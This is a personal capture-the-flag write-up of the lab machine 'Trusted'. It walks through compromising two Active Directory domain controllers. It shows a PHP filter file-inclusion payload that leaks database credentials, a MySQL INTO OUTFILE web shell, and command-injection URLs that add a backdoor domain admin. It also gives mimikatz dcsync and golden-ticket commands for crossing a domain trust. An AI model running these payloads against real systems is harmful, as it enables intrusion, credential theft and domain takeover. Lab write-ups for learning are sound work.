Trusted - Writeup - WIP - Konstantinovitz

## Enum - trusteddc - domain: `trusted.vl` - smb - anon user? -> yes - shares? -> denied - ldap - anon bind? -> no - labdc - domain: `lab.trusted.vl` - 80 - apache http - 3306 - mysql - smb - anon user? -> yes - shares? -> denied - anon bind? -> no ## `LABDC`- Webservice 80 - [[WAPP Directory Fuzzing]] reveals - `/dev` which hosts an additional site - `db.php` - interesting Site url seems like we may have some file inclusion: http://10.10.158.102/dev/index.html?view=contact.html http://10.10.158.102/dev/index.html?view=db.php reveals: connected successfully. I'm guessing that we may be able to use some sort of `.php` filter here to read some credentials.... ### Source/credential Disclosure Visiting: http://10.10.158.102/dev/index.html?view=php://filter/convert.base64-encode/resource=db.php And decoding the consequent output string results in the following source code: ``` <?php $servername = "localhost"; $username = "root"; $password = "SuperSecureMySQLPassw0rd1337."; $conn = mysqli_connect($servername, $username, $password); if (!$conn) { die("Connection failed: " . mysqli_connect_error()); } echo "Connected successfully"; ?> ``` ## [[MYSQL]] ``` mycli -u root -h $LABDC --password SuperSecureMySQLPassw0rd1337. ``` Some database enumeration reveals a table containing users and passwords: ``` MariaDB [email protected]:news> select * from users; +----+------------+--------------+-----------+----------------------------------+ | id | first_name | short_handle | last_name | password | +----+------------+--------------+-----------+----------------------------------+ | 1 | Robert | rsmith | Smith | 7e7abb54bbef42f0fbfa3007b368def7 | | 2 | Eric | ewalters | Walters | d6e81aeb4df9325b502a02f11043e0ad | | 3 | Christine | cpowers | Powers | e3d3eb0f46fe5d75eed8d11d54045a60 | +----+------------+--------------+-----------+----------------------------------+ ``` A quick password spray fails, indicating that we're likely dealing with password hashes. They seem to be MD5 passwords, one of them cracks: ``` IHateEric2 ``` Another spray -> hit for `rsmith:IHateEric2` on `LABDC` ## `rsmith` - SMB - shares? - `NETLOGON` -> empty - winrm? -> nada - ldap -> sure - users -> none new - as-rep-roast? - bloodhound -> no love, dosen't execute? ## Database Write ``` MariaDB [email protected]:news> show grants for current_user(); +--------------------------------------------------------------------------------------------------------------------------------+ | Grants for root@% | +--------------------------------------------------------------------------------------------------------------------------------+ | GRANT ALL PRIVILEGES ON *.* TO `root`@`%` IDENTIFIED BY PASSWORD '*665C8B0E1F0044B6A95EF22E82B93B3350F38A01' WITH GRANT OPTION | +--------------------------------------------------------------------------------------------------------------------------------+ ``` Means we can write files. Like a webshell: ```sql SELECT '<?php if (isset($_GET[\'cmd\'])) { echo \"<pre>\" . shell_exec($_GET[\'cmd\']) . \"</pre>\"; } ?>' INTO OUTFILE '/xampp/htdocs/hax.php'; -- windows xampp ``` Get's us a shell as `nt\authority` SYSTEM. We could now go ahead and [[Windows Backdoor Admin Account]] ``` # payload net user hacker password123! /add /domain && net localgroup Administrators hacker /add http://10.10.205.150/hax.php?cmd=net%20user%20hacker%20password123!%20/add%20/domain%20&&%20net%20localgroup%20Administrators%20hacker%20/add net group "Domain Admins" hacker /add /domain http://10.10.205.150/hax.php?cmd=net%20group%20%22Domain%20Admins%22%20hacker%20/add%20/domain ``` We can now `winrm` as `hacker` with #AD/goup/Domain-Admin rights: ```sh evil-winrm -i $LABDC -u 'hacker' -p 'password123!' ``` ## Domain Trust Pivot - Forging a [[Golden Ticket - TODO]] Given that we're domain admins, we can forge a golden ticket in the following manner: 1. Dump LSA and extract the `krbtgt` hash 2. Query for the Domain SID 3. Forge the Golden Ticket Extracting the `krbtgt` hash: ``` .\mimikatz "lsadump::dcsync /domain/lab.trusted.vl /all" "exit" ... c7a03c565c68c6fac5f8913fab576ebd ``` Next we'll query for the domain SID: ``` .\mimikatz.exe "lsadump::trust /patch" "exit" ... # LAB.trusted.vl S-1-5-21-2241985869-2159962460-1278545866 # trusted.vl S-1-5-21-3576695518-347000760-3731839591 ``` And finally we'll go ahead and forge the golden ticket: ``` .\mimikatz.exe "kerberos::golden /user:Administrator /krbtgt:c7a03c565c68c6fac5f8913fab576ebd /domain:lab.trusted.vl /sid:S-1-5-21-2241985869-2159962460-1278545866 /sids:S-1-5-21-3576695518-347000760-3731839591-519" "exit" ``` **Note:** that `-519` is appended to the `trusted.vl` `SID` in order to forge a ticket that will emulate an #AD/group/Enterprise-Administrator Verify the existence of the ticket: ``` .\mimikatz.exe "kerberos::ptt ticket.kirbi" "exit" ``` We can now go ahead and dump the `ntds.dit` file for the `trusted.vl` parent domain - yielding the NT Hash for `Administrator`: ``` .\mimikatz.exe "lsadump::dcsync /domain:trusted.vl /dc:trusted.vl /all" "exit" ``` Dosen't work for some reason, contacted the VL team.... - no response - attempted to reset the entire lab and go again - ``` mimikatz # lsadump::dcsync /domain:trusted.vl /dc:trusteddc.trusted.vl /all [DC] 'trusted.vl' will be the domain [DC] 'trusteddc.trusted.vl' will be the DC server [DC] Exporting domain 'trusted.vl' [rpc] Service : ldap [rpc] AuthnSvc : GSS_NEGOTIATE (9) ERROR kull_m_rpc_drsr_getDCBind ; RPC Exception 0x00000005 (5) ``` - Remainder of the attack chain is like: dump hashes for the `trusted.vl` parent domain - Leverage `Administrator` NT hash for access and capture `root.txt` ## Lessons Learned - mysql file writes - Domain Trusts - [[Evil-WinRM]] quirk, no interactive sessions - #tool/mimikatz drills - re-download: https://github.com/antonioCoco/RunasCs -